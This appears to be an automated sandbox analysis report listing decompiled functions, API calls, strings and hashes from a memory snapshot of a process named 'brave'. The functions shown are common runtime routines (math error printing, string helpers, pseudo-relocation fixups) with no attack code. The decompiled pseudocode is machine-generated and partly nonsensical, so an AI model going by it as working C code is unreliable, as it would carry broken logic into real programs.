0x7ff652b485ae
0x7ff652b485b7
0x7ff652b485be
0x7ff652b485c4
0x7ff652b485d3
0x7ff652b485e2
0x7ff652b485e7
0x7ff652b485e7
0x7ff652b485ef
0x7ff652b485fb
0x7ff652b48603
0x7ff652b4860d
0x7ff652b48614
0x7ff652b48616
0x7ff652b48619
0x7ff652b48622
0x7ff652b48627
0x7ff652b4863c

APIs

memcpy.MSVCRT ref: 00007FF652B485FB
memcpy.MSVCRT ref: 00007FF652B48681

Strings

basic_string::_M_create, xrefs: 00007FF652B48586

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_create
API String ID: 3510742995-3122258987
Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction ID: cfe498b529cde9523d86070f69e23d1f12381491e574b50090309b190bc7dbe9
Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction Fuzzy Hash: 4F31F862F0998285E652AE29DC8857D27626B13FCCF5D4032DE8CA7396DE7CD441C381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B47770 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF652B47770(long long* __rcx, void* __rdx, void* __r8) {
				intOrPtr _t15;
				void* _t18;

				_t15 =  *((intOrPtr*)(__rcx));
				_t18 = __r8;
				if (__r8 - 0xfffffff9 > 0) goto 0x52b47885;
				if (_t15 - __rdx > 0) goto 0x52b477c0;
				if (_t15 +  *((intOrPtr*)(_t15 - 0x18)) - __rdx < 0) goto 0x52b477c0;
				if ( *((intOrPtr*)(_t15 - 8)) <= 0) goto 0x52b477f8;
				E00007FF67FF652B48580(__rcx, _t15 +  *((intOrPtr*)(_t15 - 0x18)),  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)), __r8);
				if (_t18 == 0) goto 0x52b477e7;
				if (_t18 == 1) goto 0x52b47840;
				return memcpy(??, ??, ??);
			}

0x7ff652b47779
0x7ff652b4777f
0x7ff652b47796
0x7ff652b4779f
0x7ff652b477a8
0x7ff652b477af
0x7ff652b477c8
0x7ff652b477d0
0x7ff652b477da
0x7ff652b477f3

APIs

memcpy.MSVCRT ref: 00007FF652B477E2
memcpy.MSVCRT ref: 00007FF652B4781C

Strings

basic_string::assign, xrefs: 00007FF652B47885

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction ID: 490394507d2a676b945c4b27f19ed980dd7a60c9721093503e5ef03f9f7026c0
Opcode Fuzzy Hash: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction Fuzzy Hash: 9131B676B4968544EE119B168C8417D2792EB4BBDCF8C4532DE9DA7391DEBCE440D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B417C0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF652B4181A
MultiByteToWideChar.KERNEL32 ref: 00007FF652B4185A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction ID: 42eccf4b210d04ed7d1bd41b039710bf586a7151d20c55db320721496a68a989
Opcode Fuzzy Hash: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction Fuzzy Hash: 9031A472E1C28186E3604B24BC4036D77A1BB9279CF584231DAD8D77D5DFBDE5858B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B33E60 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF652B33E7D
GetProcessAffinityMask.KERNEL32 ref: 00007FF652B33E8C
GetCurrentProcess.KERNEL32 ref: 00007FF652B33ED2
SetProcessAffinityMask.KERNEL32 ref: 00007FF652B33EDA

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction ID: b17e7d6223d852790922aa19b877ed9bdef28c9a39813c29e8d268d026993bb0
Opcode Fuzzy Hash: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction Fuzzy Hash: 5D01F222B0861642FE2987297D1436BA7D0BB1578CF4C2235CE4E93390EEBDE945C250

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E830(void* __eax) {
				intOrPtr _t4;

				_t4 =  *0x52de10f0; // 0x1
				if (_t4 == 0) goto 0x52b2e860;
				return __eax;
			}

0x7ff652b2e845
0x7ff652b2e84d
0x7ff652b2e85f

APIs

VirtualProtect.KERNEL32(00007FF652DE1098,00007FFA26C83CA0,?,?,?,00000001,00007FF652B21261), ref: 00007FF652B2E9D5

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF652B2EA95
Unknown pseudo relocation protocol version %d., xrefs: 00007FF652B2EAA1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction ID: 15a264ffdfa3ddf643d26cdd1f99f9276bc145d7d859049a324d2396ed3e6a04
Opcode Fuzzy Hash: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction Fuzzy Hash: FB61A1B2F0874286EA208F12AC411797761BB5BBACF1C8735DA5DAB398DE7DF441C610

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B31110 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00007FF67FF652B31110(void* __rcx) {
				void* _t29;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t68;
				void* _t76;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t89;

				if (__rcx == 0) goto 0x52b31310;
				_t80 =  *0x52dd6920; // 0x7ff652de1400
				_t52 =  *_t80;
				if (_t52 == 0) goto 0x52b311f8;
				if ( *((long long*)(_t52 + 0x90)) != 0) goto 0x52b31220;
				 *((long long*)(_t52 + 0x90)) = 0x52dd2bc0;
				E00007FF67FF652B38830(0x52dd2bc0, _t76);
				_t53 =  *_t80;
				if (_t53 == 0) goto 0x52b31238;
				if ( *((long long*)(_t53 + 0x88)) == 0) goto 0x52b31260;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x88))));
				if (__rcx == _t55) goto 0x52b31348;
				if (_t55 == 0) goto 0x52b31348;
				_t56 =  *((intOrPtr*)(_t55 + 0x18));
				if (_t56 == 0) goto 0x52b31320;
				if (__rcx != _t56) goto 0x52b31190;
				_t39 = _t56;
				if (_t39 == 0) goto 0x52b31320;
				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) - 1;
				if (_t39 == 0) goto 0x52b312b8;
				_t57 =  *_t80;
				if (_t57 == 0) goto 0x52b31280;
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x52b31299;
				if (_t57 == 0) goto 0x52b3134f;
				_pop(_t81);
				goto E00007FF67FF652B38870;
				E00007FF67FF652B37060();
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x52b31145;
				if ( *_t81 != 0) goto 0x52b31220;
				E00007FF67FF652B37060();
				E00007FF67FF652B38830( *((intOrPtr*)( *_t81 + 0x90)), _t76);
				_t59 =  *_t81;
				if (_t59 != 0) goto 0x52b31164;
				E00007FF67FF652B37060();
				_t60 =  *_t81;
				if ( *((long long*)(_t59 + 0x88)) == 0) goto 0x52b31260;
				if (_t60 != 0) goto 0x52b31172;
				E00007FF67FF652B37060();
				goto 0x52b31172;
				 *((long long*)(_t60 + 0x88)) = 0x52de1388;
				goto 0x52b31179;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF652B37060();
				if ( *0x7FF652DE1418 != 0) goto 0x52b311d4;
				 *((long long*)( *_t81 + 0x90)) = 0x52dd2bc0;
				_pop(_t68);
				_pop(_t82);
				_pop(_t89);
				goto E00007FF67FF652B38870;
				_t16 = _t89 + 8; // 0x8
				_t29 = E00007FF67FF652B309D0(_t16);
				if (_t68 == 0) goto 0x52b312dd;
				 *((long long*)(_t68 + 0x18)) =  *((intOrPtr*)(_t89 + 0x18));
				free(??);
				goto 0x52b311ba;
				_t64 =  *_t82;
				if (_t64 == 0) goto 0x52b31359;
				if ( *((long long*)(_t64 + 0x88)) != 0) goto 0x52b31378;
				 *((long long*)(_t64 + 0x88)) = 0x52de1388;
				 *0x52de1388 =  *((intOrPtr*)(_t89 + 0x18));
				goto 0x52b312d0;
				return _t29;
			}

0x7ff652b3111e
0x7ff652b31124
0x7ff652b3112b
0x7ff652b31131
0x7ff652b3113f
0x7ff652b3114c
0x7ff652b31153
0x7ff652b31158
0x7ff652b3115e
0x7ff652b3116c
0x7ff652b31179
0x7ff652b3117f
0x7ff652b31188
0x7ff652b31193
0x7ff652b3119a
0x7ff652b311a3
0x7ff652b311a5
0x7ff652b311a8
0x7ff652b311ae
0x7ff652b311b4
0x7ff652b311ba
0x7ff652b311c0
0x7ff652b311ce
0x7ff652b311d7
0x7ff652b311e9
0x7ff652b311ec
0x7ff652b311f8
0x7ff652b31208
0x7ff652b31211
0x7ff652b31213
0x7ff652b31227
0x7ff652b3122c
0x7ff652b31232
0x7ff652b31238
0x7ff652b31245
0x7ff652b31248
0x7ff652b3124d
0x7ff652b31253
0x7ff652b31258
0x7ff652b31267
0x7ff652b31271
0x7ff652b31276
0x7ff652b31280
0x7ff652b31293
0x7ff652b312a0
0x7ff652b312ab
0x7ff652b312ac
0x7ff652b312ad
0x7ff652b312af
0x7ff652b312b8
0x7ff652b312bd
0x7ff652b312c5
0x7ff652b312cc
0x7ff652b312d3
0x7ff652b312d8
0x7ff652b312dd
0x7ff652b312e3
0x7ff652b312ed
0x7ff652b312fa
0x7ff652b31309
0x7ff652b3130c
0x7ff652b31318

Strings

%p not found?!?!, xrefs: 00007FF652B3132E

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %p not found?!?!
API String ID: 0-11085004
Opcode ID: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction ID: 6b34ab26672489dd83f9e1052670abf6a9636782c52103890b2ad7482b84f9c2
Opcode Fuzzy Hash: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction Fuzzy Hash: 96512F21A1AB0692FE649B55DC553B82698FF66B8CF4C8535CE8CE2391DFBCA484D310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF652B2E530() {
				intOrPtr* _t8;

				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x50], xmm7");
				asm("inc esp");
				if ( *_t8 - 6 > 0) goto 0x52b2e61c;
				goto __rax;
			}

0x7ff652b2e536
0x7ff652b2e53b
0x7ff652b2e540
0x7ff652b2e549
0x7ff652b2e55f

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597
Unknown error, xrefs: 00007FF652B2E61C

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction ID: 0f6456ae76b253c2e576c18251a6ddd9d8e37305dc1f6ff2bfe51dcf6746cc34
Opcode Fuzzy Hash: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction Fuzzy Hash: 67018262918E8482D7168F1CDC411EA7375FF5A79EF185321EA8C66260DF6AE543CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E600() {

				goto 0x52b2e56f;
				goto 0x52b2e56f;
				0;
				return 0;
			}

0x7ff652b2e617
0x7ff652b2e623
0x7ff652b2e62e
0x7ff652b2e632

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF652B2E600
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction ID: 000a5b30c9ed47c502b1b781bc0077ae8c793f828cb192ba3fb20cdfcecb24fa
Opcode Fuzzy Hash: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction Fuzzy Hash: 5DF06252D18E8882D3028F1CE8401EBB375FF4E78DF195325EE8D7A165DF69D5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E610() {

				goto 0x52b2e56f;
				goto 0x52b2e56f;
				0;
				return 0;
			}

0x7ff652b2e617
0x7ff652b2e623
0x7ff652b2e62e
0x7ff652b2e632

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597
Total loss of significance (TLOSS), xrefs: 00007FF652B2E610

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction ID: b82f94099d3710146029be0cfcf2564ea69d1ea9733b5ef90388aba30bc3858b
Opcode Fuzzy Hash: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction Fuzzy Hash: 6BF06252D18E8482D3028F1CA8401EB7375FF4E78DF195325EE8D76565DF69D5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E5D0() {

				goto 0x52b2e56f;
				goto 0x52b2e56f;
				0;
				return 0;
			}

0x7ff652b2e617
0x7ff652b2e623
0x7ff652b2e62e
0x7ff652b2e632

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597
Argument domain error (DOMAIN), xrefs: 00007FF652B2E5D0

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction ID: 47a802068bbb7570a77e410e70d0e7db4d9f0bdbcb3580080a0a1e3620f1a9cc
Opcode Fuzzy Hash: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction Fuzzy Hash: E1F06252D18E8482D3028F1CA8401EB7375FF4E78DF185325EE8D76565DF69E5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E5E0() {

				goto 0x52b2e56f;
				goto 0x52b2e56f;
				0;
				return 0;
			}

0x7ff652b2e617
0x7ff652b2e623
0x7ff652b2e62e
0x7ff652b2e632

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF652B2E5E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

